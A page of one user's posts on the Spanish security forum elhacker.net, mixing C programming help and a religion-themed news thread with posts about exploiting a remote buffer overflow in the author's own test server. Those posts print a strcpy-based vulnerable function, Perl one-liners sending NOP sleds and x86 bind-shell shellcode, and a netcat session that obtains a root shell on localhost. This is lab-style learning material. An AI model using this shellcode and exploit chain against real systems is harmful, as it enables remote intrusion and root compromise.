elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Sigue las noticias más importantes de seguridad informática en el Twitter! de elhacker.NET


  Mostrar Mensajes
Páginas: 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 [17] 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 ... 125
161  Programación / Programación C/C++ / Re: (SOLUCIONADO) me dicen si les funciona!! en: 22 Febrero 2011, 18:49 pm
El problema es cuando metes más de un carácter... BoF total y nunca más claro :P Con %s debería soltarte un waring, es un fallo de seguridad serio... Sencillamente abrid el programa con GDB y meterle unas 20 ases...
162  Foros Generales / Noticias / Re: "Dios odia a los hackers" en: 22 Febrero 2011, 18:47 pm
No diferenciais entre Iglesia Católica y Bautista. Los cristianos rezamos por la unión, ellos por la separación :P
Eso es lo malo de ser un ser humano...
163  Programación / Programación C/C++ / Re: me dicen si les funciona!! en: 22 Febrero 2011, 01:21 am
Sí, me pasa lo mismo. La cosa es que no va ni con fgetc ni con getc ni con scanf. Bah, ahora codeo uno con fgets, a lo bruto :P
164  Programación / Programación C/C++ / Re: Generar números aleatorios sin que se repitan ... en C++ en: 22 Febrero 2011, 01:17 am
http://foro.elhacker.net/programacion_cc/generar_numeros_aleatorios_sin_repeticionc-t315014.0.html
http://foro.elhacker.net/programacion_cc/como_crear_numeros_aleatorios_sin_que_se_repitan-t268765.0.html

Hay más en Códigos interesantes, post interesantes... Etc.

Suerte!
165  Seguridad Informática / Bugs y Exploits / Re: ¿ Fallo BoF Remoto Linux ? en: 22 Febrero 2011, 00:37 am
Mmm, yo sencillamente modifico el código con un printf y listo xD  :silbar:
La cosa es que ahora se come la shellcode, la empieza por donde no es y me suelta "Instrucción ilegal". Ahora, en GDB gracias a los nops corre xD

Seguiré mirando...
_________________________________________________________

Modf: Vaya con la shellcode...
Añado al code
Código
  1. int vuln (char *trampa)
  2. {
  3. char buffer [100];
  4. strcpy (buffer, trampa);
  5. printf ("Buffer [0x%08x] contains %s...\n", &buffer, buffer);
  6. }
  7.  
NC
Código:
juanra@Juanra:~$ nc -vv localhost 5074
localhost [127.0.0.1] 5074 (?) open
 sent 0, rcvd 0
juanra@Juanra:~$
Exploit
Código:
juanra@Juanra:~$ perl -e 'print "\x90"x12 . "\x31\xc0\x50\x40\x89\xc3\x50\x40\x50\x89\xe1\xb0\x66\xcd\x80\x31\xd2\x52\x66\x68\x13\xd2\x43\x66\x53\x89\xe1\x6a\x10\x51\x50\x89\xe1\xb0\x66\xcd\x80\x40\x89\x44\x24\x04\x43\x43\xb0\x66\xcd\x80\x83\xc4\x0c\x52\x52\x43\xb0\x66\xcd\x80\x93\x89\xd1\xb0\x3f\xcd\x80\x41\x80\xf9\x03\x75\xf6\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x52\x53\x89\xe1\xb0\x0b\xcd\x80" . "\x28\xf8\xff\xbf" . "\x90"' | hK vc 127.0.0.1 31337
hK 2.0 - By Sagrini (2010) - 22/02/2011 01:04:25
22/02/2011 01:04:25   Got connection with 127.0.0.1:31337
juanra@Juanra:~$
Ejecuto...
Código:
juanra@Juanra:~/Escritorio/Serv$ sudo ./serv 31337
SmallServ 2.0 - By Sagrini - Sagrini 2010 - 22/02/2011 01:04:19
22/02/2011 01:04:19   Starting up...

22/02/2011 01:04:25   Got connection from 127.0.0.1:58332
22/02/2011 01:04:25   RECV 109 bytes: ������������1�P@��P@P���f̀1�Rfh�CfS��jQP���f̀@�D$CC�f̀��
              RRC�f̀��Ѱ?̀A��u�Rhn/shh//bi��RS���
Fallo de segmentación

1. Ejecuto el servidor (port 31337).
2. Ejecuto el exploit. El servidor recibe la cadena y queda parado.
3. Ejecuto el NC. El netcat dice que se cierra la conexión y el servidor que "fallo de segmentación".

¿?¿?¿?
_________________________________________________________

Aparte, de pruebas...

Server
Código:
juanra@Juanra:~/Escritorio/Serv$ sudo ./serv 31337
SmallServ 2.0 - By Sagrini - Sagrini 2010 - 22/02/2011 01:13:49
22/02/2011 01:13:49   Starting up...

22/02/2011 01:13:51   Got connection from 127.0.0.1:50840
22/02/2011 01:13:51   RECV 109 bytes: ��������������������������������������������������������������������������������1��1ҲjB��1�C̀1�1�@̀(���
Buffer [0xbffff824] contains ��������������������������������������������������������������������������������1��1ҲjB��1�C̀1�1�@̀(���...
Bjuanra@Juanra:~/Escritorio/Serv$
Exploit
Código:
juanra@Juanra:~$ perl -e 'print "\x90"x80 . "\x31\xc0\xb0\x04\x31\xd2\xb2\x01\x6a\x42\x89\xe1\x31\xdb\x43\xcd\x80\x31\xc0\x31\xdb\x40\xcd\x80" . "\x28\xf8\xff\xbf" . "\x90"' | hK vc 127.0.0.1 31337
hK 2.0 - By Sagrini (2010) - 22/02/2011 01:13:51
22/02/2011 01:13:51   Got connection with 127.0.0.1:31337
juanra@Juanra:~$

La shellcode sólo escribía una B y salía. Funciona a la perfección :P
166  Seguridad Informática / Bugs y Exploits / Re: ¿ Fallo BoF Remoto Linux ? en: 21 Febrero 2011, 23:21 pm
Perdona el doblepost, pero cuando consigues algo que quieres te motivas un puñado ;)
Te explico...

Servidor
Código:
juanra@Juanra:~/Escritorio/Serv$ sudo gdb -q serv
(gdb) r 31330
Starting program: /home/juanra/Escritorio/Serv/serv 31330
SmallServ 2.0 - By Sagrini - Sagrini 2010 - 21/02/2011 23:16:53
21/02/2011 23:16:53   Starting up...

21/02/2011 23:17:00   Got connection from 127.0.0.1:43225
21/02/2011 23:17:00   RECV 109 bytes: ������������1�P@��P@P���f̀1�Rfh�CfS��jQP���f̀@�D$CC�f̀��
              RRC�f̀��Ѱ?̀A��u�Rhn/shh//bi��RS���                                              

Exploit line
Código:
juanra@Juanra:~$ perl -e 'print "\x90"x12 . "\x31\xc0\x50\x40\x89\xc3\x50\x40\x50\x89\xe1\xb0\x66\xcd\x80\x31\xd2\x52\x66\x68\x13\xd2\x43\x66\x53\x89\xe1\x6a\x10\x51\x50\x89\xe1\xb0\x66\xcd\x80\x40\x89\x44\x24\x04\x43\x43\xb0\x66\xcd\x80\x83\xc4\x0c\x52\x52\x43\xb0\x66\xcd\x80\x93\x89\xd1\xb0\x3f\xcd\x80\x41\x80\xf9\x03\x75\xf6\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x52\x53\x89\xe1\xb0\x0b\xcd\x80" . "\x35\xf8\xff\xbf" . "\x90"' | hK vc 127.0.0.1 31330
hK 2.0 - By Sagrini (2010) - 21/02/2011 23:17:00
21/02/2011 23:17:00   Got connection with 127.0.0.1:31330
juanra@Juanra:~$

Bind Shell 5074
Código:
juanra@Juanra:~$ nc -vv localhost 5074
localhost [127.0.0.1] 5074 (?) open
whoami
root
groups
root
exit
 sent 19, rcvd 10
juanra@Juanra:~$

12 NOPS + 92 SHELLCODE + 4 RET + 1 BASURA
Código
  1. buffer [cont-1]='\0';

Lo que me fastidia es que sólo corre cuando abres el servidor desde GDB. Mañana lo miraré  ::)
Un saludo!
167  Foros Generales / Noticias / Re: "Dios odia a los hackers" en: 21 Febrero 2011, 23:13 pm
saGRIINIII escondete en algun sitio te vamos a dar cazaaaa jajaja XD es broma menos mal que no todos los cristinanos son gilipollas?

Una de la cosas que creo que la iglesia podria odiar a los hackers . es por la inteligencia... como di hace poco en historia un pampleto vi...
Nombles-> nosotros te mandamos.
Clero->  Nosotros te atontamos...

esto en sus años pues era verdad..

Joer algunos hay, pero no son ni mucho menos la mayoria. Y los que lo son al tiempo dejan de ser cristianos ;)
La iglesia no odia a los hackers, (tenéis un mal concepto de la Iglesia, dejad de leeros el Código Da Vinci que es mentira) nunca se ha pronunciado sobre eso. La Iglesia y los hackers no tienen mucho que ver. Además, ser un hacker en el sentido puro de la palabra es bastante aprobado por la iglesia. En el sentido puro, no lo que dicen los periódicos  :¬¬
168  Programación / Programación C/C++ / Re: me dicen si les funciona!! en: 21 Febrero 2011, 22:55 pm
Seguro que no te habría costado mucho a ti...
Aparte, aplaudo tu forma de usar el tabulador para que sea más fácil modificar el código, si olvidar el nombre superdescriptivo de las variables...

Código
  1. #include <stdio.h>
  2. #include <stdlib.h>
  3.  
  4. int main()
  5. {
  6. int i,j, opc;
  7. char letra;
  8.  
  9. for(i=0;i<10;i++)
  10. {
  11. for(j=0;j<5;j++)
  12. {
  13. printf("Ingrese letra de letra del apartamento: ");
  14. letra = getc (stdin);
  15.  
  16. printf("1) Pago expensas\t2) No pago expensas\nOpcion: ");
  17. scanf ("%d", &opc);
  18.  
  19. switch  (opc)
  20. {
  21. case 1 : printf ("\nPiso %d letra del apartamento %c no pago expensas!\n",i,letra); break;
  22. case 2 : printf ("\nHola Carlos!\n"); break;
  23. default: printf ("\nOpcion incorrecta...\n"); break;
  24. }
  25. }
  26. }
  27. return 0;
  28. }
  29.  
Lo raro es que se me salta el getc del apartamento y no el scanf... xD
Suerte!
169  Seguridad Informática / Bugs y Exploits / Re: ¿ Fallo BoF Remoto Linux ? en: 21 Febrero 2011, 22:43 pm
A mi lo que me falla es mi shellcode. He hecho una que printa AAAA y funciona, ahora, la del remoto no va... Ahora voy a mirar el desensamblado a ver a qué amiguito llama :P
170  Programación / Programación C/C++ / Re: copiar el contenido de un fichero a otro nuevo, caracter por caracter en: 21 Febrero 2011, 22:25 pm
Si eso no escribas en mayusc...

Código
  1. #include <stdio.h>
  2. #include <string.h>
  3.  
  4. int main (int argc, char *argv [])
  5. {
  6. printf ("Código del programa 0.1 : Sagrini 2011\n");
  7. if (argc != 3)
  8. {
  9. printf ("Uso: %s <origen> <destino>\n\n", argv [0]);
  10. return 1;
  11. }
  12.  
  13. FILE *fp, *dest;
  14. char buff;
  15. if ((fp=fopen (argv [1], "r+"))==NULL)
  16. {
  17. printf ("%s no existe o no puede ser abierto...\n\n", argv [1]);
  18. return 1;
  19. }
  20. if ((dest=fopen (argv [2], "w+"))==NULL)
  21. {
  22. printf ("%s no puede ser creado...\n\n", argv [2]);
  23. return 1;
  24. }
  25.  
  26. while (!feof (fp))
  27. {
  28. buff=fgetc (fp);
  29. fprintf (dest, "%c", buff);
  30. }
  31.  
  32. printf ("Operacion finalizada con exito\n\n");
  33. fclose (fp);
  34. fclose (dest);
  35. return 0;
  36. }
  37.  
  38.  

Al final del archivo añade un 0xff, pero eso ya lo corriges tú :P
Suerte!
Páginas: 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 [17] 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 ... 125
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines